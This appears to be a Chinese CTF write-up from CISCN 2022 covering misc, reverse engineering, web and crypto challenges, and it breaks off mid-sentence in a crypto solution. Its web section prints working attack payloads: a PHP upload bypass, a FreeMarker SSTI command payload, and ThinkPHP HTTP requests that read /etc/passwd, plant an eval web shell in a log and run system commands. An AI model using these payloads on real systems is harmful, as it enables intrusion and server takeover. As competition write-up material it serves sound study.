CISCN2022东北赛区WP-MapleLeaves
团队成员
Do1phln b477ery sfc9982 0HB
Misc
Conversion
密文中字母跨度在 G-K 间,不禁让人想往 A-F 平移,平移后即为且全部为可打印 ASCII 文本。 拖入本地离线 CyberChef 中先使用Base32,再使用Base85 IP method 解密得到 flag
听说这是一个二维码
分析音频,无有效信息。加之题目体制侧重于文件方向,使用 010 Editor 打开音频文件,在尾部发现类似 Base64 的文本信息,经过两次解密后得到某个东西的密码。 初步考虑文件内含压缩包或者音频存在隐写信息。经多个工具尝试过后发现 DeepVoice 可以提取隐藏的文件,提取后是 .pcap 格式,观察后为内网虚拟机互喷 ICMP 包。 目标地址只有 .0 .255 两个,结合题目,猜测可能代表了二维码的黑白像素,又发现记录条数正好可以被开方,爽爆了!提取出来,用 Sublime Text 3 删掉多余信息,转化为01矩阵。
使用脚本:
import xlwt
book = xlwt.Workbook()
style = xlwt.easyxf('pattern: pattern solid, fore_colour black;font: height 250')
table=book.add_sheet('flag_code',cell_overwrite_ok=True)
with open( 'flag.pcap.out', 'r' ) as f:
qr=f.read()
qrlist=qr.split("\n")
m=0
for i in qrlist:
n=0
for j in i:
table.col(n).width=256*3
if j=='1':
table.write(m,n,'',style=style)
else:
table.write(m,n,'')
n+=1
m+=1
book.save('ctfcode.xls')
好恼啊,手机 Data Metrix 扫不出来!
Win + Shift + C 使用系统自带反转灰度 后扫描即可
涂色板
± 0x20 <=> XOR 0x20
b = bytearray(open('flag.dat', 'rb').read())
for i in range(len(b)):
b[i] ^= 0x20
open('pixel.png', 'wb').write(b)
Stegseek + Rockyou.txt 字典库爆破密码
数学Time:
- 459*60=27540
- 先抓住12,再抓45,最后注意左上角就行
- 如果是n种颜色(n大于等于4)就是n(n-1)(n2-2n+2)(n-2)4
- 最少3种颜色,有30种,3种颜色时上式仍旧成立(
Pixel
从象棋语句中提取数字解压文件,获取到密码后得到 flag.dat ,使用二进制编辑器观察文件末尾,两次Base64解码得到密码。
观察十六进制标志,疑似为微信撤回图片文件。提取出照片得到林荫小道照片一张,送入 PixelJihad https://sekao.net/pixeljihad/ 后使用之前获得的密码解密。
RE
easycpp
打开文件用IDA分析,进入main函数
int __cdecl main(int argc, const char **argv, const char **envp)
{
void **v3;
size_t v4;
size_t v5;
void **v6;
void **v7;
void **v8;
void **v9;
void **v10;
void **v11;
void **v12;
int v13;
const char *v14;
sub_140002410(argc, "Input:", envp);
sub_140002B60(&qword_140037590);
if ( Size != 38 )
goto LABEL_22;
v5 = 0i64;
v3 = &Buf1;
do
{
v6 = &Buf1;
v7 = &Buf1;
if ( (unsigned __int64)qword_140036C68 >= 0x10 )
v6 = (void **)Buf1;
if ( (unsigned __int64)qword_140036C68 >= 0x10 )
v7 = (void **)Buf1;
*((_BYTE *)v7 + v5) ^= *((_BYTE *)v6 + v5 + 1);
v8 = &Buf1;
v9 = &Buf1;
if ( (unsigned __int64)qword_140036C68 >= 0x10 )
v8 = (void **)Buf1;
if ( (unsigned __int64)qword_140036C68 >= 0x10 )
v9 = (void **)Buf1;
*((_BYTE *)v9 + v5 + 1) ^= *((_BYTE *)v8 + v5 + 2);
v10 = &Buf1;
v11 = &Buf1;
if ( (unsigned __int64)qword_140036C68 >= 0x10 )
v10 = (void **)Buf1;
if ( (unsigned __int64)qword_140036C68 >= 0x10 )
v11 = (void **)Buf1;
*((_BYTE *)v11 + v5 + 2) ^= *((_BYTE *)v10 + v5 + 3);
++v5;
v4 = Size;
}
while ( v5 < Size - 3 );
v12 = &Buf2;
if ( (unsigned __int64)qword_140036C48 >= 0x10 )
v12 = (void **)Buf2;
if ( (unsigned __int64)qword_140036C68 >= 0x10 )
v3 = (void **)Buf1;
if ( Size != qword_140036C40 || (v13 = memcmp(v3, v12, Size), v14 = "Right!", v13) )
LABEL_22:
v14 = "Wrong!";
sub_140002410(v3, v14, v4);
return 0;
}
可见基本逻辑就是输入字符串后经过一系列异或操作然后进行比较即可判断最终结果对错。显然qword_140036C68 为0xF恒大于0x10,因此可以看出基本逻辑就是反复移位异或,得出结果与原有数组比较,因此只需逆向进行异或操作即可,编写脚本
enc = [
10, 11, 125, 47, 127, 103, 101, 48, 99, 96,
55, 63, 60, 63, 51, 58, 60, 59, 53, 60,
62, 108, 100, 49, 100, 108, 59, 104, 97, 98,
101, 54, 51, 96, 98, 54, 28, 125
]
i = len(enc) - 1
while i >= 3:
enc[i-1] ^= enc[i]
enc[i-2] ^= enc[i - 1]
enc[i-3] ^= enc[i - 2]
i = i - 1
for i in enc:
print(chr(i), end='')
flag正确,本题得解
crackme1
下载到apk文件后,用jadx打开分析发现逻辑没有套在CPP里面,遂直接进行分析 可知程序逻辑是把输入分8段算md5 将题中给出的字符串分八段分别进行md5爆破,最后将结果拼接后即可得到flag
Web
Identity
burp 抓包,返回的 header 中有 identity: GuessWhatThis1sY0urIdentity 将 identity=GuessWhatThis1sY0urIdentity 作为参数再次请求得到文件上传点 h1dden_p4ge.php 文件上传,文件名改大写 PHP 绕过,文件内容绕过用
<script language="php">system('xxx')</script>
ezser
这题一开始想利用绕过 __wakeup,然后版本是 8.x 绕不过,于是改用引用来绕过 __wakeup
<?php
class A{
public $functions=[];
}
class B{
private $a;
private $b;
public $c;
function __construct()
{
$a = new A();
$this->a = &$a->functions;
$this->b = array(
"_name" => array(
new C(),
"getFlag"
)
);
$this->c=$a;
}
}
class C{
public function getFlag(){
echo 11111;
}
}
$b = new B();
echo "data=".urlencode(serialize($b)).PHP_EOL;
ezssti
试了下 {{1 + 1}},报错看出是 java,于是找个 java 的 payload,居然通了… payload: xxx/render?name=%3C%23assign%20value%3D%22freemarker.template.utility.Execute%22%3Fnew()%3E%24%7Bvalue(%22cat%20F1ag_is_h3re%22)%7D
eztp
首先,路由入口点 /?s=home/index/textBox Application\Home\Controller\IndexController.class.php
<?php
namespace Home\Controller;
use Think\Controller;
class IndexController extends Controller
{
...
public function textBox(){
$query = urldecode(I("post.query"));
parse_str($query,$array);
$this->assign("array",$array);
$this->display(T("Home@default/list"));
}
}
Application\Home\View\default\list.html
<form action="/?s=home/index/textBox" method="post">
<label>query</label><input type="text" size="10" maxlength="30" name="query">
<input type="submit" name="" value="submit">
</form>
<textarea><?php echo W("Query/query",array("param"=>$array));?></textarea>
Application\Home\Widget\QueryWidget.class.php
<?php
namespace Home\Widget;
class QueryWidget
{
public function query($text){
if(isset($text['name'])&&isset($text['id'])){
$info = B($text['name'],$text['tag'],$text['id']);
return $info;
}else{
var_dump($text);
}
}
}
ThinkPHP\Common\functions.php
<?
function B($name, $tag = '', &$params = null)
{
if ('' == $tag) {
$name .= 'Behavior';
}
return \Think\Hook::exec($name, $tag, $params);
}
ThinkPHP\Library\Think\Hook.class.php
<?
class Hook{
...
public static function exec($name, $tag, &$params = null)
{
if ('Behavior' == substr($name, -8)) {
$tag = 'run';
}
$addon = new $name();
return $addon->$tag($params);
}
...
}
这里的 name tag params 都是可控的,于是我们就可以实例化任意类并调用任意方法,恰好有这样一个类 ThinkPHP\Library\Think\Storage\Driver\File.class.php
<?php
class File extends Storage{
...
public function load($_filename, $vars = null)
{
if (!is_null($vars)) {
extract($vars, EXTR_OVERWRITE);
}
include $_filename;
}
...
}
于是构造参数调用 Think\Storage\Driver\File->load 即可包含任意文件。
POST /?s=home/index/textBox HTTP/1.1
Host: 172.16.30.176:58002
Content-Length: 105
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://172.16.30.176:58002
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://172.16.30.176:58002/?s=home/index/textBox
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
query=name%253D%255CThink%255CStorage%255CDriver%255CFile%2526id%253D%252Fetc%252Fpasswd%2526tag%253Dload
成功包含 /etc/passwd,于是找一个可以包含的可控文本文件。通过观察可以发现这个框架是有日志文件的,而且会把 E 函数的报错信息写入日志文件,搜索一个可以触发 E 函数报错且信息可控的类方法 ThinkPHP\Library\Org\Net\Http.class.php
<?
namespace Org\Net;
class Http
public static function download($filename, $showname = '', $content = '', $expire = 180)
{
if (is_file($filename)) {
$length = filesize($filename);
} elseif (is_file(UPLOAD_PATH . $filename)) {
$filename = UPLOAD_PATH . $filename;
$length = filesize($filename);
} elseif ('' != $content) {
$length = strlen($content);
} else {
E($filename . L('下载文件不存在!'));
}
if (empty($showname)) {
$showname = $filename;
}
...
于是我们就可以 getshell 了,先触发报错将 shell 写入日志,再文件包含日志文件 写 shell
POST /?s=home/index/textBox HTTP/1.1
Host: 172.16.30.176:58002
Content-Length: 143
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://172.16.30.176:58002
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://172.16.30.176:58002/?s=home/index/textBox
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
query=name%253DOrg%255CNet%255CHttp%2526id%253D%253C%253Fphp%2520%2540eval(%2524_POST%255Bpass%255D)%253B%2520%253F%253E%2526tag%253Ddownload
读 flag,这里的文件路径是先 ls 来的
POST /?s=home/index/textBox HTTP/1.1
Host: 172.16.30.176:58002
Content-Length: 188
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://172.16.30.176:58002
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://172.16.30.176:58002/?s=home/index/textBox
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
query=name%253D%255CThink%255CStorage%255CDriver%255CFile%2526id%253D.%252FApplication%252FRuntime%252FLogs%252FHome%252F22_06_18.log%2526tag%253Dload&pass=system('cat /Secret_is_h3re');
Crypto
gcrd2(100)
题目
import numpy as np
from flag import T
import random
np.set_printoptions(threshold=np.inf)
def get():
while True:
x = []
for i in range(32):
add = [random.randint(0, 10)] * i + [random.randint(0, 10)] * (32 - i)
x.append(add)
if np.linalg.matrix_rank(x) == 32:
return x
a = np.array(get())
b = np.array(get())
# dot 矩阵乘法
aT = np.dot(a, T)
bT = np.dot(b, T)
with open('out', 'w') as f:
for i in range(32):
f.write(str(str(aT[i, :])[1:-1].replace('\n', '')) + '\n') # 写入aT
for i in range(32):
f.write(str(str(bT[i, :])[1:-1].replace('\n', '')) + '\n') # 写入 bT
f.close()
res = np.dot(bT, np.dot(T, aT))
flag = 0
for i in str(res[:, 0])[1:-1].replace('\n', '').split(' '):
if not i == '':
flag = flag + int(i)
print(flag)
题解
aT = np.dot(a, T)
bT = np.dot(b, T)
可知:T为矩阵aT、bT的最大右公因子
由gcrd得:
将aT、bT堆叠成
[
a
T
b
T
]
\begin{bmatrix} aT \\ bT\end{bmatrix}
[aTbT?],初等行变化 利用MATLAB化为最简行阶梯形矩阵
aTbT = [8, 8, 8, 8, 8, 8, 8, 8, 8, 8, 8, 8, 8, 8, 8, 8, 8, 8, 8, 8, 8, 8, 8, 8, 8, 8, 8, 8, 8, 8, 8, 8;
8, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5;
4, 4, 6, 6, 6, 6, 6, 6, 6, 6, 6, 6, 6, 6, 6, 6, 6, 6, 6, 6, 6, 6, 6, 6, 6, 6, 6, 6, 6, 6, 6, 6;
4, 4, 4, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9;
4, 4, 4, 4, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5;
10, 10, 10, 10, 10, 6, 6, 6, 6, 6, 6, 6, 6, 6, 6, 6, 6, 6, 6, 6, 6, 6, 6, 6, 6, 6, 6, 6, 6, 6, 6, 6;
2, 2, 2, 2, 2, 2, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9;
8, 8, 8, 8, 8, 8, 8, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5;
3, 3, 3, 3, 3, 3, 3, 3, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9;
9, 9, 9, 9, 9, 9, 9, 9, 9, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1;
6, 6, 6, 6, 6, 6, 6, 6, 6, 6, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1;
8, 8, 8, 8, 8, 8, 8, 8, 8, 8, 8, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1;
2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3;
4, 4, 4, 4, 4, 4, 4, 4, 4, 4, 4, 4, 4, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0;
8, 8, 8, 8, 8, 8, 8, 8, 8, 8, 8, 8, 8, 8, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0;
9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 6, 6, 6, 6, 6, 6, 6, 6, 6, 6, 6, 6, 6, 6, 6, 6, 6;
10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0;
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 8, 8, 8, 8, 8, 8, 8, 8, 8, 8, 8, 8, 8, 8, 8;
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10;
7, 7, 7, 7, 7, 7, 7, 7, 7, 7, 7, 7, 7, 7, 7, 7, 7, 7, 7, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2;
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9;
1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 6, 6, 6, 6, 6, 6, 6, 6, 6, 6, 6;
4, 4, 4, 4, 4, 4, 4, 4, 4, 4, 4, 4, 4, 4, 4, 4, 4, 4, 4, 4, 4, 4, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2;
6, 6, 6, 6, 6, 6, 6, 6, 6, 6, 6, 6, 6, 6, 6, 6, 6, 6, 6, 6, 6, 6, 6, 10, 10, 10, 10, 10, 10, 10, 10, 10;
3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 2, 2, 2, 2, 2, 2, 2, 2;
1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 9, 9, 9, 9, 9, 9, 9;
2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 1, 1, 1, 1, 1, 1;
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 8, 8, 8, 8, 8;
3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 9, 9, 9, 9;
3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 0, 0, 0;
9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 3, 3;
6, 6, 6, 6, 6, 6, 6, 6, 6, 6, 6, 6, 6, 6, 6, 6, 6, 6, 6, 6, 6, 6, 6, 6, 6, 6, 6, 6, 6, 6, 6, 10;
1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1;
10, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2;
9, 9, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3;
0, 0, 0, 8, 8, 8, 8, 8, 8, 8, 8, 8, 8, 8, 8, 8, 8, 8, 8, 8, 8, 8, 8, 8, 8, 8, 8, 8, 8, 8, 8, 8;
0, 0, 0, 0, 6, 6, 6, 6, 6, 6, 6, 6, 6, 6, 6, 6, 6, 6, 6, 6, 6, 6, 6, 6, 6, 6, 6, 6, 6, 6, 6, 6;
1, 1, 1, 1, 1, 4, 4, 4, 4, 4, 4, 4, 4, 4, 4, 4, 4, 4, 4, 4, 4, 4, 4, 4, 4, 4, 4, 4, 4, 4, 4, 4;
9, 9, 9, 9, 9, 9, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1;
5, 5, 5, 5, 5, 5, 5, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10;
7, 7, 7, 7, 7, 7, 7, 7, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3;
5, 5, 5, 5, 5, 5, 5, 5, 5, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1;
6, 6, 6, 6, 6, 6, 6, 6, 6, 6, 8, 8, 8, 8, 8, 8, 8, 8, 8, 8, 8, 8, 8, 8, 8, 8, 8, 8, 8, 8, 8, 8;
3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 7, 7, 7, 7, 7, 7, 7, 7, 7, 7, 7, 7, 7, 7, 7, 7, 7, 7, 7, 7, 7;
1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0;
8, 8, 8, 8, 8, 8, 8, 8, 8, 8, 8, 8, 8, 6, 6, 6, 6, 6, 6, 6, 6, 6, 6, 6, 6, 6, 6, 6, 6, 6, 6, 6;
5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 4, 4, 4, 4, 4, 4, 4, 4, 4, 4, 4, 4, 4, 4, 4, 4, 4, 4;
3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 6, 6, 6, 6, 6, 6, 6, 6, 6, 6, 6, 6, 6, 6, 6, 6, 6;
7, 7, 7, 7, 7, 7, 7, 7, 7, 7, 7, 7, 7, 7, 7, 7, 6, 6, 6, 6, 6, 6, 6, 6, 6, 6, 6, 6, 6, 6, 6, 6;
3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10;
9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5;
9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 7, 7, 7, 7, 7, 7, 7, 7, 7, 7, 7, 7, 7;
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9;
9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10;
10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2;
2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 10, 10, 10, 10, 10, 10, 10, 10, 10;
1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 9, 9, 9, 9, 9, 9, 9, 9;
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1;
10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 2, 2, 2, 2, 2, 2;
8, 8, 8, 8, 8, 8, 8, 8, 8, 8, 8, 8, 8, 8, 8, 8, 8, 8, 8, 8, 8, 8, 8, 8, 8, 8, 8, 9, 9, 9, 9, 9;
10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 6, 6, 6, 6;
5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 4, 4, 4;
10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 1, 1;
4, 4, 4, 4, 4, 4, 4, 4, 4, 4, 4, 4, 4, 4, 4, 4, 4, 4, 4, 4, 4, 4, 4, 4, 4, 4, 4, 4, 4, 4, 4, 0;];
t = rref(aTbT)
舍去下半部分0矩阵,得到32*32的单位阵T
代回题目,得解
import hashlib
import numpy as np
with open('/Users/wenhui/Downloads/1655300570gcrd/out.txt') as f:
aTbT = []
num = 1
for i in f.readlines():
tmp = []
for each in i.replace('\n', '').split(' '):
if each != '':
tmp.append(int(each))
aTbT.append(tmp)
print(str(tmp)[1:-1]+';')
num += 1
aT = aTbT[:32]
bT = np.array(aTbT[32:])
T = []
for i in range(32):
tmp = [0 for i in range(32)]
tmp[i] = 1
T.append(tmp)
res = np.dot(bT, np.dot(T, aT))
flag = 0
for i in str(res[:, 0])[1:-1].replace('\n', '').split(' '):
if not i == '':
flag = flag + int(i)
f = hashlib.md5()
f.update(str(flag).encode())
print('flag{'+str(f.hexdigest())+'}')
math1(200)
题目
import gmpy2
from Crypto.Util.number import *
from flag import flag
assert flag.startswith(b"flag{")
assert flag.endswith(b"}")
message=bytes_to_long(flag)
def keygen(nbit, dbit):
if 2*dbit < nbit:
while True:
a1 = getRandomNBitInteger(dbit)
b1 = getRandomNBitInteger(nbit//2-dbit)
n1 = a1*b1+1
if isPrime(n1):
break
while True:
a2 = getRandomNBitInteger(dbit)
b2 = getRandomNBitInteger(nbit//2-dbit)
n2=a2*b2+1
n3=a1*b2+1
if isPrime(n2) and isPrime(n3):
break
while True:
a3=getRandomNBitInteger(dbit)
if gmpy2.gcd(a3,a1*b1*a2*b2)==1:
v1=(n1-1)*(n2-1) # phi1
k=(a3*inverse(a3,v1)-1)//v1 # k * phi1=k * v1 = ed-1
v2=k*b1+1
if isPrime(v2):
return a3,n1*n2,n3*v2
def encrypt(msg, pubkey):
return pow(msg, pubkey[0], pubkey[1])
nbit = 1024
dbit = 256
e, n1, n2=keygen(nbit, dbit)
print('e =', e)
print('n1 =', n1)
print('n2 =', n2)
c1 = encrypt(message, [e, n1])
c2 = encrypt(message, [e, n2])
print('enc1 =', c1)
print('enc2 =', c2)
# e = 86905291018330218127760596324522274547253465551209634052618098249596388694529
# n1 = 112187114035595515717020336420063560192608507634951355884730277020103272516595827630685773552014888608894587055283796519554267693654102295681730016199369580577243573496236556117934113361938190726830349853086562389955289707685145472794173966128519654167325961312446648312096211985486925702789773780669802574893
# n2 = 95727255683184071257205119413595957528984743590073248708202176413951084648626277198841459757379712896901385049813671642628441940941434989886894512089336243796745883128585743868974053010151180059532129088434348142499209024860189145032192068409977856355513219728891104598071910465809354419035148873624856313067
# enc1 = 71281698683006229705169274763783817580572445422844810406739630520060179171191882439102256990860101502686218994669784245358102850927955191225903171777969259480990566718683951421349181856119965365618782630111357309280954558872160237158905739584091706635219142133906953305905313538806862536551652537126291478865
# enc2 = 7333744583943012697651917897083326988621572932105018877567461023651527927346658805965099102481100945100738540533077677296823678241143375320240933128613487693799458418017975152399878829426141218077564669468040331339428477336144493624090728897185260894290517440392720900787100373142671471448913212103518035775
题解
n
1
=
a
1
b
1
+
1
,
n
2
=
a
2
b
2
+
1
,
n
3
=
a
1
b
2
+
1
,
v
2
=
k
b
1
+
1
n_1 = a_1b_1+1,n_2=a_2b_2+1, n_3 = a_1b_2+1,v_2=kb_1+1
n1?=a1?b1?+1,n2?=a2?b2?+1,n3?=a1?b2?+1,v2?=kb1?+1,且都为素数
?
n
1
=
(
n
1
?
1
)
(
n
2
?
1
)
=
a
1
a
2
b
1
b
2
=
v
1
\phi _{n{_1}} = (n_1-1)(n_2-1) = a_1a_2b_1b_2=v_1
?n1??=(n1??1)(n2??1)=a1?a2?b1?b2?=v1?
?
n
2
=
(
n
3
?
1
)
(
v
2
?
1
)
=
a
1
b
2
k
b
1
\phi _{n{_2}} = (n_3-1)(v_2-1) = a_1b_2kb_1
?n2??=(n3??1)(v2??1)=a1?b2?kb1?
由k=(a3*inverse(a3,v1)-1)//v1 、e=a3 知:
k
=
(
e
?
i
n
v
(
e
,
?
n
1
)
?
1
)
/
/
p
h
i
=
e
d
?
1
/
/
?
n
1
=
k
?
?
n
1
/
/
?
n
1
=
k
k = (e*inv(e, \phi_{n_1}) -1) // phi = ed-1 // \phi_{n_1} = k*\phi_{n_1} // \phi_{n_1} = k
k=(e?inv(e,?n1??)?1)//phi=ed?1//?n1??=k??n1??//?n1??=k
解题思路也是明确的,知道e了,只要知道一个phi就可以求出对应私钥d,便可求解明文m
试了许多方式,题目说数学很重要,以为是n1与n2相乘后有什么关系,但形式越发复杂,无果
加减乘都无效后,尝试除,起初也没看到直接的破题点
后看着题目math1,猛然想起除法所对应连分数,试着分析了下
N
2
N
1
=
(
a
1
b
2
+
1
)
(
k
b
1
+
1
)
(
a
1
b
1
+
1
)
(
a
2
b
2
+
1
)
≈
a
1
b
2
k
b
1
a
1
b
1
a
2
b
2
=
k
a
2
\frac{N2}{N1}=\frac{(a_1b_2+1)(kb_1+1)}{(a_1b_1+1)(a_2b_2+1)}≈\frac{a_1b_2kb_1}{a_1b_1a_2b_2}=\frac{k}{a_2}
N1N2?=(a1?b1?+1)(a2?b2?+1)(a1?b2?+1)(kb1?+1)?≈a1?b1?a2?b2?a1?b2?kb1??=a2?k?
再根据Legendre理论,
k
a
2
\frac{k}{a_2}
a2?k?为
N
2
N
1
\frac{N2}{N1}
N1N2?连分数
便可求出一系列的k、a2可能值
又有
e
d
?
1
=
k
?
n
1
ed-1=k \phi_{n_1}
ed?1=k?n1??,所以:
?
n
1
≡
(
?
1
)
?
k
?
1
m
o
d
??
e
\phi_{n_1} ≡ (-1)*k^{-1} \mod e
?n1??≡(?1)?k?1mode
以及
?
n
1
≡
a
1
a
2
b
1
b
2
=
0
m
o
d
??
a
2
\phi_{n_1} ≡ a_1a_2b_1b_2 = 0 \mod a_2
?n1??≡a1?a2?b1?b2?=0moda2?
利用中国剩余定理联立之,得到
?
n
1
m
o
d
??
e
a
2
\phi_{n_1} \mod ea_2
?n1??modea2?
最后,为进一步确定
?
n
1
\phi_{n_1}
?n1??值,利用:Font metrics not found for font: .
